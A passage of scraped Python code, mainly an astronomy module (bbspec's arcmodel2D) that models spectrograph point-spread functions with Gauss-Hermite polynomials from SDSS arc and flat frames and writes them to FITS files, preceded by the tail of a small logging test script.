__name__ == '__main__':\n 写入日志(\"hello李华盛\")","sub_path":"test/测试日志写入.py","file_name":"测试日志写入.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603185720","text":"import numpy as n\nimport pyfits as pf\nfrom bbspec.spec2d import boltonfuncs as GH\nfrom scipy import special,interpolate,linalg\n\nclass arcmodel2D:\n\n x = n.arange(-5,6,1) \n y = n.arange(-5,6,1)\n fibNo = 500\n fibBun = 20\n xpoints = 4114\n degree = 3\n nbund = 25\n modules = ('numpy as n','pyfits as pf','scipy.special','scipy.interpolate as interpolate','scipy.linalg')\n\n def __init__(self,indir = '.', outdir = '.'):\n self.indir = indir\n self.outdir = outdir\n self.color = None\n self.reqwave = None\n \n def model_arc_flat_bundle(self,arcid,flatid,i_bund):\n self.setarc_flat(arcid,flatid)\n return self.model_arc(i_bund)\n \n def setarc_flat(self,arcid,flatid):\n self.arcid = arcid\n self.flatid = flatid\n self.setcolor()\n \n spArc_file = self.indir + '/spArc-' + self.arcid + '.fits' \n spFlat_file = self.indir + '/spFlat-' + self.flatid + '.fits' \n data_file = self.indir + '/sdProc-' + self.arcid + '.fits' \n\n # Data & invvar from sdR files\n data = pf.open(data_file)\n self.biasSubImg = data[0].data\n self.invvr = data[1].data\n data.close()\n \n # spArc files\n h_spArc = pf.open(spArc_file)\n self.spArc_image = h_spArc[0].data\n self.good_lambda_val = h_spArc[1].data\n self.waveset = self.get_data(h_spArc,2)\n self.ysigma = self.get_data(h_spArc,4)\n h_spArc.close()\n \n #spFlat files\n h_spFlat = pf.open(spFlat_file)\n self.spFlat_image = h_spFlat[0].data\n self.peakPos = self.get_data(h_spFlat,1)\n self.xsigma= self.get_data(h_spFlat,3)\n h_spFlat.close() \n \n\n def get_data(self,hdu,i): return n.rec.array(hdu[i].data,dtype=hdu[i].data.dtype)\n \n def setcolor(self):\n pos = self.arcid.rfind('/')\n if pos<0: self.color = self.arcid[0]\n elif pos<len(self.arcid)-1: self.color = self.arcid[pos+1]\n else: self.color = None\n if self.color!='r' and self.color!='b': print(\"ERROR: File name not in correct format\")\n \n if (self.color == 'r'): \n self.ypoints = 4128\n self.yvalues = n.arange(0,self.ypoints,1)\n self.nwavelen = 65\n # wavelength indexes which do not have outliers \n self.reqwave = n.array([6,9,10,11,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,37,41,42,44,46,47,48,49,50,52,53,55,56,57,59,60,62,64]) #00126630\n \n elif (self.color == 'b'): \n self.ypoints = 4112\n self.yvalues = n.arange(0,self.ypoints,1)\n self.nwavelen = 45 \n # wavelength indexes which do not have outliers \n #self.reqwave = n.array([0,1,4,5,10,14,15,16,25,26,28,29,30,32,33,34,35,36,37,38,39,40,41,42,44,45]) #00115982\n self.reqwave = n.array([4,5,9,12,13,15,19,24,25,26,27,28,29,31,32,33,34,35,36,37,38,39,40,41,43,44]) #00126630\n \n def model_arc(self, i_bund):\n i_bund = int(i_bund)\n #- make floating point errors fatal (fail early, fail often)\n n.seterr(all='raise')\n\n # Data from spArc files\n [goodwaveypos, good_wavelength, wavelength, arcSigma] = self.dataspArc()\n\n # Data from spFlat files\n [fiberflat, xpos_final, flatSigma] = self.dataspFlat()\n\n # allocating space for variables\n self.yvalues = n.arange(0,self.ypoints,1)\n GHparam = n.zeros((self.nwavelen,arcmodel2D.nbund,15,15))\n fib = n.arange(0,arcmodel2D.fibNo,1) \n ngoodwave=len(good_wavelength)\n chi_sqrd = n.zeros((self.nwavelen,arcmodel2D.nbund,1))\n\n coeffAll = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree + 1,15,15))\n xcenter = n.zeros((self.nwavelen,arcmodel2D.nbund,arcmodel2D.fibBun))\n ycenter = n.zeros((self.nwavelen,arcmodel2D.nbund,arcmodel2D.fibBun))\n sigma = n.zeros((self.nwavelen,arcmodel2D.nbund,arcmodel2D.fibBun))\n\n # define max order\n maxorder = 4\n\n kcons = i_bund*arcmodel2D.fibBun\n for i_actwave in range(0, self.nwavelen):\n # declare variables\n #print good_wavelength.size,i_actwave\n actwavelength = good_wavelength[i_actwave]\n func = interpolate.interp1d(good_wavelength,goodwaveypos[:,fib[kcons]], kind='cubic')\n yact = func(actwavelength)\n y1 = round(yact) -10 \n y2 = round(yact) +10 \n x1 = round(xpos_final[round(yact),fib[kcons]])\n x2 = round(xpos_final[round(yact),fib[kcons+19]])\n x1im = (x1)-10\n x2im = (x2)+10\n y1im = (y1)-10\n y2im = (y2)+10\n fibcons = n.arange(kcons,kcons+arcmodel2D.fibBun,1)\n rowimage = self.biasSubImg[y1im:y2im+1,x1im:x2im+1]\n x_pix = n.arange(x1im,x2im+1,1) \n y_pix = n.arange(y1im,y2im+1,1)\n numx = len(x_pix) \n numy = len(y_pix)\n numk = len(fibcons) \n numlambda_val = 1\n flag = 0 \n n_k = n.zeros((len(fibcons),1))\n basisfuncstack = n.zeros((numlambda_val,numk,numy,numx))\n basisstack = n.zeros((numy*numx,1))\n mm = 0 ; nn = 0\n \n # Creating basis function\n for mor in range (0,maxorder+1):\n for nor in range (0, maxorder+1):\n if (mor+nor <= 4):\n mm = n.hstack((mm,mor))\n nn = n.hstack((nn,nor))\n [ff, basisfunc, basisimage,flag,xcenarr,ycenarr, sigmaarr] = self.create_basisfunc(actwavelength,good_wavelength,goodwaveypos,xpos_final,arcSigma,flatSigma,rowimage,x1im,x2im,y1im,y2im,fiberflat,kcons,mor,nor) \n # checking if all values are non-zero\n if (flag == 1):\n basisfuncstack = n.hstack((basisfuncstack,basisfunc))\n basisstack = n.hstack((basisstack,basisimage))\n else:\n break \n if (flag == 0):\n break\n if (flag == 0):\n continue\n \n\n basis = n.sum(n.sum(basisfuncstack[:,:,:,:],axis = 1),axis = 0)\n nk = n.shape(basisfunc)[1]\n nlambda = n.shape(basisfunc)[0]\n ni = n.shape(basisfunc)[2]\n nj = n.shape(basisfunc)[3]\n\n N = n.zeros((ni*nj,ni*nj))\n invvr_sub = self.invvr[y1im:y2im+1,x1im:x2im+1]\n flat_invvr = n.ravel(invvr_sub)\n N = n.diag(flat_invvr)\n \n p = n.ravel(rowimage)\n p1= n.zeros((len(p),1))\n p1[:,0] = p\n B1 = basisstack[:,1:]\n scaledbasis = n.zeros((ni*nj ,1))\n [theta,t2,l1,t1,t2] = self.calparam(B1,N,p1)\n GHparam[i_actwave,i_bund,mm[1:],nn[1:]] = theta[:,0]/theta[0,0]\n #print theta\n #print i_actwave \n # model image\n scaledbasis = n.dot(B1, theta)\n scaledbasis1 = n.zeros((len(scaledbasis[:,0]),1))\n scaledbasis1[:,0] = scaledbasis[:,0]\n \n #chi-squared value\n ndiag = n.zeros((len(N),1))\n ndiag[:,0] = n.diag(N)\n nz = n.where(scaledbasis1 != 0)\n err = (p1[nz]-scaledbasis1[nz])*n.sqrt(ndiag[nz])\n chi_sqrd[i_actwave,i_bund,0] = n.mean(n.power(err,2))\n scaledbasis.resize(ni,nj) \n scaledbasis4 = scaledbasis\n \n # Residual values\n residualGH = rowimage - scaledbasis\n \n xcenter[i_actwave,i_bund,:] = xcenarr\n ycenter[i_actwave,i_bund,:] = ycenarr\n sigma[i_actwave,i_bund,:] = sigmaarr \n \n #arcmodel2D.degree = 3\n \n # loop to get the value of PSF parameters at all wavelengths \n for i_fib in range(0, arcmodel2D.fibBun):\n for i_plot in range(1, len(mm)):\n wavecons = wavelength[:, i_bund*arcmodel2D.fibBun + i_fib]\n param = GHparam[self.reqwave, i_bund, mm[i_plot], nn[i_plot]]\n z = n.polyfit(good_wavelength[self.reqwave], param, arcmodel2D.degree)\n p = n.poly1d(z)\n coeffAll[i_fib, :, mm[i_plot], nn[i_plot]] = z\n \n PSFArc = self.createPSFArc(GHparam,xcenter, ycenter, sigma,good_wavelength,mm,nn,i_bund)\n PSFBasis = self.createPSFBasis(coeffAll, wavelength, xpos_final, flatSigma,good_wavelength,mm,nn,i_bund)\n return (PSFArc , PSFBasis)\n\n # Function creates basis function at known wavelengths of arc-frames\n def create_basisfunc(self, actwavelength,good_wavelength,goodwaveypos,xpos_final,arcSigma,flatSigma,rowimage,x1im,x2im,y1im,y2im,fiberflat,kcons,mor,nor):\n datacenterval = n.zeros((arcmodel2D.fibBun,1))\n fibcons = n.arange(kcons,kcons+arcmodel2D.fibBun,1) \n n_k = n.zeros((len(fibcons),1))\n numx = n.shape(rowimage)[1]\n numy = n.shape(rowimage)[0]\n numk = len(fibcons) \n numlambda_val = 1\n basisfunc = n.zeros((numlambda_val,numk,numy,numx)) \n zero1 = n.zeros((numlambda_val,numk,numy,numx)) \n zero2 = n.zeros((numy*numx,1)) \n basisstack = 0\n xcenarr = n.zeros((arcmodel2D.fibBun))\n ycenarr = n.zeros((arcmodel2D.fibBun))\n sigmaarr = n.zeros((arcmodel2D.fibBun))\n for i_k in range(0,numk):\n testwave = actwavelength\n func = interpolate.interp1d(good_wavelength,goodwaveypos[:,fibcons[i_k]], kind='cubic')\n ypix = func(testwave)\n xpix = xpos_final[round(ypix),fibcons[i_k]]\n sigmaA = arcSigma[round(ypix),fibcons[i_k]] \n sigmaF = flatSigma[round(ypix),fibcons[i_k]]\n iceny = round(ypix)\n ycen = ypix\n yr = ycen-iceny\n cenA = yr\n icenx = round(xpix)\n xcen = (xpix)\n xr = xcen-icenx\n cenF = xr \n xcenarr[i_k] = xcen\n ycenarr[i_k] = ycen\n sigmaarr[i_k] = sigmaF\n starty= iceny-y1im\n startx= icenx-x1im\n xPSF = n.zeros((len(arcmodel2D.x),1))\n yPSF = n.zeros((len(arcmodel2D.y),1))\n #xPSF[:,0] = GH.pgh(x=arcmodel2D.x, xc = cenF, sigma = sigmaF ,m = mor)\n xPSF[:,0] = GH.pgh(arcmodel2D.x, mor, cenF, sigmaF)\n yPSF[:,0] = GH.pgh(arcmodel2D.y, nor, cenA, sigmaF)\n out = n.outer(yPSF,xPSF)\n datacenterval[i_k,0] = rowimage[starty,startx]\n basisfunc[0,i_k,starty+arcmodel2D.y[0]:(starty+arcmodel2D.y[len(arcmodel2D.y)-1]+1),startx+arcmodel2D.x[0]:(startx+arcmodel2D.x[len(arcmodel2D.x)-1]+1)] = out\n func_n_k = interpolate.interp1d(self.yvalues,fiberflat[fibcons[i_k],:])\n n_kVal = func_n_k(ypix)\n # relative fiber throughput (n_k) changed to take value from spFlat files.\n n_k[i_k,0] = n_kVal\n n_kzero= n.where(n_k[:,0] == 0)\n if (n.shape(n_kzero)[1] > 15 ):\n flag = 0\n #return(n_k,zero1,zero2,flag,datacenterval)\n return(n_k,zero1,zero2,flag,xcenarr,ycenarr,sigmaarr)\n else:\n basisimage = self.basisimg(basisfunc, n_k)\n flag = 1\n #return (n_k,basisfunc, basisimage,flag,datacenterval) \n return (n_k,basisfunc, basisimage,flag,xcenarr, ycenarr, sigmaarr) \n\n # supress the four dimensional basis function to two-dimensional\n def basisimg(self, A00, n_k):\n nlambda = n.shape(A00)[0]\n nk = n.shape(A00)[1]\n ni = n.shape(A00)[2]\n nj = n.shape(A00)[3]\n A_twod = n.zeros((ni*nj,nlambda*nk))\n B00= n.zeros((ni*nj ,1))\n i_l = 0\n i_m = 0\n numlambda_val = nlambda\n numk = nk\n for i_lam in range(0,numlambda_val):\n for i_k in range(0,numk):\n a = A00[i_lam, i_k,:,:]\n b = n.ravel(a)\n nterms = len(b)\n A_twod[:,i_m] = b\n i_m = i_m + 1\n B00 = n.dot(A_twod,n_k) \n return B00\n\n def calparam(self, B,N,p1):\n l1 = n.dot(n.transpose(B),N)\n t1 = n.dot(l1,p1)\n t2 = n.dot(l1,B)\n theta = n.dot(linalg.pinv(t2),t1)\n return(theta,t2,l1,t1,t2)\n \n # write to FITS file\n def createPSFBasis(self, coeffAll, wavelength, xpos_final, flatSigma,good_wavelength,mm,nn, i_bund):\n mm = [0,0,0,0,0,0,1,1,1,1,2,2,2,3,3,4]\n nn = [0,0,1,2,3,4,0,1,2,3,0,1,2,0,1,0] \n theta0 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta1 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta2 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta3 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta4 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta5 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta6 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta7 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta8 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta9 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta10 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta11 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta12 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta13 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta14 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n final_wavelength = n.zeros((arcmodel2D.fibBun,self.ypoints))\n\n theta0 = coeffAll[: , :,mm[1],nn[1]]\n theta1 = coeffAll[: , :,mm[2],nn[2]]\n theta2 = coeffAll[: , :,mm[3],nn[3]]\n theta3 = coeffAll[: ,:, mm[4],nn[4]]\n theta4 = coeffAll[: , :,mm[5],nn[5]]\n theta5 = coeffAll[: , :,mm[6],nn[6]]\n theta6 = coeffAll[: , :,mm[7],nn[7]]\n theta7 = coeffAll[: , :,mm[8],nn[8]]\n theta8 = coeffAll[: , :,mm[9],nn[9]]\n theta9 = coeffAll[: , :,mm[10],nn[10]]\n theta10 = coeffAll[: , :,mm[11],nn[11]]\n theta11 = coeffAll[: ,:, mm[12],nn[12]]\n theta12 = coeffAll[: ,:, mm[13],nn[13]]\n theta13 = coeffAll[: , :,mm[14],nn[14]]\n theta14 = coeffAll[: , :,mm[15],nn[15]]\n \n a = n.arange(0,self.ypoints, dtype=float)\n b=n.transpose(a)\n q = b.repeat(arcmodel2D.fibBun)\n a = n.reshape(q, (self.ypoints,arcmodel2D.fibBun))\n ycenterf = n.transpose(a)\n \n xcenterf = n.transpose(xpos_final[:, i_bund*arcmodel2D.fibBun : i_bund*arcmodel2D.fibBun+arcmodel2D.fibBun])\n sigmaarrf = n.transpose(flatSigma[:, i_bund*arcmodel2D.fibBun : i_bund*arcmodel2D.fibBun+arcmodel2D.fibBun])\n final_wavelength= n.transpose(n.log10(wavelength[:, i_bund*arcmodel2D.fibBun : i_bund*arcmodel2D.fibBun+arcmodel2D.fibBun]))\n\n hdu0 = pf.PrimaryHDU(xcenterf)\n hdu0.header.update('PSFTYPE', 'GAUSS-HERMITE', 'GAUSS-HERMITE POLYNOMIALS') \n hdu0.header.update('NPIX_X', arcmodel2D.xpoints, 'number of image pixels in the X-direction')\n hdu0.header.update('NPIX_Y', self.ypoints, 'number of image pixels in the Y-direction')\n hdu0.header.update('NFLUX', self.ypoints, 'number of flux bins per spectrum [NAXIS1]')\n hdu0.header.update('NSPEC', arcmodel2D.fibBun, 'number of spectra [NAXIS2]')\n hdu0.header.update('PSFPARAM', 'X', 'X position as a function of flux bin')\n\n hdu1 = pf.ImageHDU(ycenterf)\n hdu1.header.update('PSFPARAM', 'Y', 'Y position as a function of flux bin')\n\n hdu2 = pf.ImageHDU(final_wavelength)\n hdu2.header.update('PSFPARAM', 'LogLam', 'Known Wavelengths of an arc-frame')\n\n hdu3 = pf.ImageHDU(sigmaarrf)\n hdu3.header.update('PSFPARAM', 'sigma', 'Gaussian sigma values of basis')\n\n hdu4 = pf.ImageHDU(theta0)\n hdu4.header.update('PSFPARAM', 'PGH(0,0)', 'Pixelated Gauss-Hermite Order: (0,0)')\n\n hdu5 = pf.ImageHDU(theta1)\n hdu5.header.update('PSFPARAM', 'PGH(0,1)', 'Pixelated Gauss-Hermite Order: (0,1)')\n\n hdu6 = pf.ImageHDU(theta2)\n hdu6.header.update('PSFPARAM', 'PGH(0,2)', 'Pixelated Gauss-Hermite Order: (0,2)')\n\n hdu7 = pf.ImageHDU(theta3)\n hdu7.header.update('PSFPARAM', 'PGH(0,3)', 'Pixelated Gauss-Hermite Order: (0,3)')\n\n hdu8 = pf.ImageHDU(theta4)\n hdu8.header.update('PSFPARAM', 'PGH(0,4)', 'Pixelated Gauss-Hermite Order: (0,4)') \n\n hdu9 = pf.ImageHDU(theta5)\n hdu9.header.update('PSFPARAM', 'PGH(1,0)', 'Pixelated Gauss-Hermite Order: (1,0)')\n\n hdu10 = pf.ImageHDU(theta6)\n hdu10.header.update('PSFPARAM', 'PGH(1,1)', 'Pixelated Gauss-Hermite Order: (1,1)')\n\n hdu11 = pf.ImageHDU(theta7)\n hdu11.header.update('PSFPARAM', 'PGH(1,2)', 'Pixelated Gauss-Hermite Order: (1,2)')\n\n hdu12 = pf.ImageHDU(theta8)\n hdu12.header.update('PSFPARAM', 'PGH(1,3)', 'Pixelated Gauss-Hermite Order: (1,3)')\n\n hdu13 = pf.ImageHDU(theta9)\n hdu13.header.update('PSFPARAM', 'PGH(2,0)', 'Pixelated Gauss-Hermite Order: (2,0)')\n\n hdu14 = pf.ImageHDU(theta10)\n hdu14.header.update('PSFPARAM', 'PGH(2,1)', 'Pixelated Gauss-Hermite Order: (2,1)')\n\n hdu15 = pf.ImageHDU(theta11)\n hdu15.header.update('PSFPARAM', 'PGH(2,2)', 'Pixelated Gauss-Hermite Order: (2,2)')\n\n hdu16 = pf.ImageHDU(theta12)\n hdu16.header.update('PSFPARAM', 'PGH(3,0)', 'Pixelated Gauss-Hermite Order: (3,0)')\n\n hdu17 = pf.ImageHDU(theta13)\n hdu17.header.update('PSFPARAM', 'PGH(3,1)', 'Pixelated Gauss-Hermite Order: (3,1)')\n\n hdu18 = pf.ImageHDU(theta14)\n hdu18.header.update('PSFPARAM', 'PGH(4,0)', 'Pixelated Gauss-Hermite Order: (4,0)')\n hdulist = pf.HDUList([hdu0, hdu1, hdu2,hdu3,hdu4,hdu5,hdu6,hdu7,hdu8,hdu9,hdu10,hdu11,hdu12,hdu13,hdu14, hdu15, hdu16, hdu17, hdu18])\n \n cols = {'arcid':self.arcid,'i_bund':str(i_bund).zfill(2)}\n fname = self.outdir + \"/spBasisPSF-GH4-%(arcid)s-%(i_bund)s.fits\" % cols\n \n hdulist.writeto(fname, clobber=True)\n return (fname)\n\n def createPSFArc(self, GHparam, xcenter, ycenter, sigma,good_wavelength,mm,nn, i_bund):\n xcenterf = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n ycenterf = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n sigmaarrf = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta0 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta1 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta2 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta3 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta4 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta5 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta6 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta7 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta8 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta9 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta10 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta11 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta12 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta13 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta14 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n final_wavelength = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n\n mm = [0,0,0,0,0,0,1,1,1,1,2,2,2,3,3,4]\n nn = [0,0,1,2,3,4,0,1,2,3,0,1,2,0,1,0] \n \n for i_wave in range(0, self.nwavelen):\n theta0[:,i_wave] = GHparam[i_wave, : , mm[1],nn[1]].repeat(arcmodel2D.fibBun)\n theta1[:,i_wave] = GHparam[i_wave, : , mm[2],nn[2]].repeat(arcmodel2D.fibBun)\n theta2[:,i_wave] = GHparam[i_wave, : , mm[3],nn[3]].repeat(arcmodel2D.fibBun)\n theta3[:,i_wave] = GHparam[i_wave, : , mm[4],nn[4]].repeat(arcmodel2D.fibBun)\n theta4[:,i_wave] = GHparam[i_wave, : , mm[5],nn[5]].repeat(arcmodel2D.fibBun)\n theta5[:,i_wave] = GHparam[i_wave, : , mm[6],nn[6]].repeat(arcmodel2D.fibBun)\n theta6[:,i_wave] = GHparam[i_wave, : , mm[7],nn[7]].repeat(arcmodel2D.fibBun)\n theta7[:,i_wave] = GHparam[i_wave, : , mm[8],nn[8]].repeat(arcmodel2D.fibBun)\n theta8[:,i_wave] = GHparam[i_wave, : , mm[9],nn[9]].repeat(arcmodel2D.fibBun)\n theta9[:,i_wave] = GHparam[i_wave, : , mm[10],nn[10]].repeat(arcmodel2D.fibBun)\n theta10[:,i_wave] = GHparam[i_wave, : , mm[11],nn[11]].repeat(arcmodel2D.fibBun)\n theta11[:,i_wave] = GHparam[i_wave, : , mm[12],nn[12]].repeat(arcmodel2D.fibBun)\n theta12[:,i_wave] = GHparam[i_wave, : , mm[13],nn[13]].repeat(arcmodel2D.fibBun)\n theta13[:,i_wave] = GHparam[i_wave, : , mm[14],nn[14]].repeat(arcmodel2D.fibBun)\n theta14[:,i_wave] = GHparam[i_wave, : , mm[15],nn[15]].repeat(arcmodel2D.fibBun)\n \n xcenterf[:,i_wave] = n.ravel(xcenter[i_wave, :, :])\n ycenterf[:,i_wave] = n.ravel(ycenter[i_wave, :, :])\n \n final_wavelength[:,i_wave] = (n.log10(good_wavelength[i_wave])).repeat(arcmodel2D.fibNo)\n \n sigmaarrf[:,i_wave] = n.ravel(sigma[i_wave, :, :])\n\n \n # write to FITS file\n hdu0 = pf.PrimaryHDU(xcenterf)\n hdu0.header.update('PSFTYPE', 'GAUSS-HERMITE', 'GAUSS-HERMITE POLYNOMIALS') \n hdu0.header.update('NPIX_X', arcmodel2D.xpoints, 'number of image pixels in the X-direction')\n hdu0.header.update('NPIX_Y', self.ypoints, 'number of image pixels in the Y-direction')\n hdu0.header.update('NFLUX', self.nwavelen, 'number of flux bins per spectrum [NAXIS1]')\n hdu0.header.update('NSPEC', arcmodel2D.fibNo, 'number of spectra [NAXIS2]')\n hdu0.header.update('PSFPARAM', 'X', 'X position as a function of flux bin')\n\n hdu1 = pf.ImageHDU(ycenterf)\n hdu1.header.update('PSFPARAM', 'Y', 'Y position as a function of flux bin')\n\n hdu2 = pf.ImageHDU(final_wavelength)\n hdu2.header.update('PSFPARAM', 'LogLam', 'Known Wavelengths of an arc-frame')\n\n hdu3 = pf.ImageHDU(sigmaarrf)\n hdu3.header.update('PSFPARAM', 'sigma', 'Gaussian sigma values of basis')\n\n hdu4 = pf.ImageHDU(theta0)\n hdu4.header.update('PSFPARAM', 'PGH(0,0)', 'Pixelated Gauss-Hermite Order: (0,0)')\n\n hdu5 = pf.ImageHDU(theta1)\n hdu5.header.update('PSFPARAM', 'PGH(0,1)', 'Gauss-Hermite Order: (0,1)')\n\n hdu6 = pf.ImageHDU(theta2)\n hdu6.header.update('PSFPARAM', 'PGH(0,2)', 'Gauss-Hermite Order: (0,2)')\n\n hdu7 = pf.ImageHDU(theta3)\n hdu7.header.update('PSFPARAM', 'PGH(0,3)', 'Gauss-Hermite Order: (0,3)')\n\n hdu8 = pf.ImageHDU(theta4)\n hdu8.header.update('PSFPARAM', 'PGH(0,4)', 'Gauss-Hermite Order: (0,4)') \n\n hdu9 = pf.ImageHDU(theta5)\n hdu9.header.update('PSFPARAM', 'PGH(1,0)', 'Gauss-Hermite Order: (1,0)')\n\n hdu10 = pf.ImageHDU(theta6)\n hdu10.header.update('PSFPARAM', 'PGH(1,1)', 'Gauss-Hermite Order: (1,1)')\n\n hdu11 = pf.ImageHDU(theta7)\n hdu11.header.update('PSFPARAM', 'PGH(1,2)', 'Gauss-Hermite Order: (1,2)')\n\n hdu12 = pf.ImageHDU(theta8)\n hdu12.header.update('PSFPARAM', 'PGH(1,3)', 'Gauss-Hermite Order: (1,3)')\n\n hdu13 = pf.ImageHDU(theta9)\n hdu13.header.update('PSFPARAM', 'PGH(2,0)', 'Gauss-Hermite Order: (2,0)')\n\n hdu14 = pf.ImageHDU(theta10)\n hdu14.header.update('PSFPARAM', 'PGH(2,1)', 'Gauss-Hermite Order: (2,1)')\n\n hdu15 = pf.ImageHDU(theta11)\n hdu15.header.update('PSFPARAM', 'PGH(2,2)', 'Gauss-Hermite Order: (2,2)')\n\n hdu16 = pf.ImageHDU(theta12)\n hdu16.header.update('PSFPARAM', 'PGH(3,0)', 'Gauss-Hermite Order: (3,0)')\n\n hdu17 = pf.ImageHDU(theta13)\n hdu17.header.update('PSFPARAM', 'PGH(3,1)', 'Gauss-Hermite Order: (3,1)')\n\n hdu18 = pf.ImageHDU(theta14)\n hdu18.header.update('PSFPARAM', 'PGH(4,0)', 'Gauss-Hermite Order: (4,0)')\n\n hdulist = pf.HDUList([hdu0, hdu1, hdu2,hdu3,hdu4,hdu5,hdu6,hdu7,hdu8,hdu9,hdu10,hdu11,hdu12,hdu13,hdu14, hdu15, hdu16, hdu17, hdu18])\n\n cols = {'arcid':self.arcid,'i_bund':str(i_bund).zfill(2)}\n fname = self.outdir + \"/spArcPSF-GH4-%(arcid)s-%(i_bund)s.fits\" % cols\n\n hdulist.writeto(fname, clobber=True)\n return (fname)\n \n def dataspArc(self):\n\n # Number of fibers \n nfib = n.shape(self.spArc_image)[0]\n ndatapt = n.shape(self.spArc_image)[1]\n\n # y-sigma values\n xmin = self.ysigma['XMIN'][0]\n xmax = self.ysigma['XMAX'][0]\n coeff = self.ysigma['COEFF'][0]\n \n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeff = coeff.size / nfib\n coeff = coeff.reshape( (nfib, ncoeff) )\n \n nx = xmax-xmin+1\n xbase = n.arange(xmin,xmax-xmin+1,1)\n x_1 = xmin\n x_2 = xmax\n a = 2/(xmax-xmin)\n b = -1-a*xmin\n x_p_base = a*xbase + b\n l= n.zeros((ndatapt,))\n legendreDim = n.shape(coeff)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, legendreDim):\n ltemp = special.legendre(i_leg)\n ltemp = ltemp(x_p_base)\n l = n.vstack((l,ltemp))\n\n ### r = n.transpose(coeff[0,:,:])\n r = coeff\n \n Ysig = n.dot(r,l[1:])\n Ysig = n.transpose(Ysig)\n arcSigma =Ysig\n \n #wavelength value at each Y-center\n xminwave = self.waveset['XMIN'][0]\n xmaxwave = self.waveset['XMAX'][0]\n coeffwave = self.waveset['COEFF'][0]\n\n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeffwave = coeffwave.size / nfib\n coeffwave = coeffwave.reshape( (nfib, ncoeffwave) )\n\n nxwave = xmaxwave-xminwave+1\n xbasewave = n.arange(xminwave,xmaxwave-xminwave+1,1)\n x_1wave = xminwave\n x_2wave = xmaxwave\n awave = 2/(xmaxwave-xminwave)\n bwave = -1-awave*xminwave\n x_p_basewave = awave*xbasewave + bwave\n dimwavept = n.shape(coeffwave)[1]\n dimwavept = dimwavept/nfib\n lwave= n.zeros((ndatapt,))\n dimwavept = n.shape(coeffwave)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, dimwavept):\n lwavetemp = special.legendre(i_leg)\n lwavetemp = lwavetemp(x_p_basewave)\n lwave = n.vstack((lwave,lwavetemp))\n\n rwave = coeffwave.reshape(nfib,dimwavept)\n wavelength_tmp = n.dot(rwave,lwave[1:])\n wavelength= n.transpose(wavelength_tmp)\n wavelength = n.power(10,wavelength)\n \n # good wavelengths of Arc lamps \n good_wavelength = self.good_lambda_val[:,0]\n wavenum = n.shape(self.good_lambda_val)[0]\n lambdadim2 = n.shape(self.good_lambda_val)[1]\n goodwaveypos = self.good_lambda_val[0:wavenum, 1:lambdadim2]\n return(goodwaveypos, good_wavelength, wavelength, arcSigma)\n\n def dataspFlat(self):\n \n # Number of fibers \n nfib = n.shape(self.spFlat_image)[0]\n ndatapt = n.shape(self.spFlat_image)[1] \n \n # X- sigma \n xminSig = self.xsigma['XMIN'][0]\n xmaxSig = self.xsigma['XMAX'][0]\n coeffXSig = self.xsigma['COEFF'][0]\n\n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeffXSig = coeffXSig.size / nfib\n coeffXSig = coeffXSig.reshape( (nfib, ncoeffXSig) )\n \n nxSig = xmaxSig-xminSig+1\n xbaseSig = n.arange(xminSig,xmaxSig-xminSig+1,1)\n x_1Sig = xminSig\n x_2Sig = xmaxSig\n aSig = 2/(xmaxSig-xminSig)\n bSig = -1-aSig*xminSig\n x_p_baseSig = aSig*xbaseSig + bSig\n dimXSig = n.shape(coeffXSig)[1]\n dimXSig = dimXSig/nfib\n lXSig= n.zeros((ndatapt,))\n dimXSig = n.shape(coeffXSig)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, dimXSig):\n lSigtemp = special.legendre(i_leg)\n lSigtemp = lSigtemp(x_p_baseSig)\n lXSig = n.vstack((lXSig,lSigtemp))\n \n rsigma = coeffXSig.reshape(nfib, dimXSig)\n Xsig = n.dot(rsigma,lXSig[1:])\n Xsig = n.transpose(Xsig)\n flatSigma = Xsig\n\n # X-centers\n xmin = self.peakPos['XMIN'][0]\n xmax = self.peakPos['XMAX'][0]\n 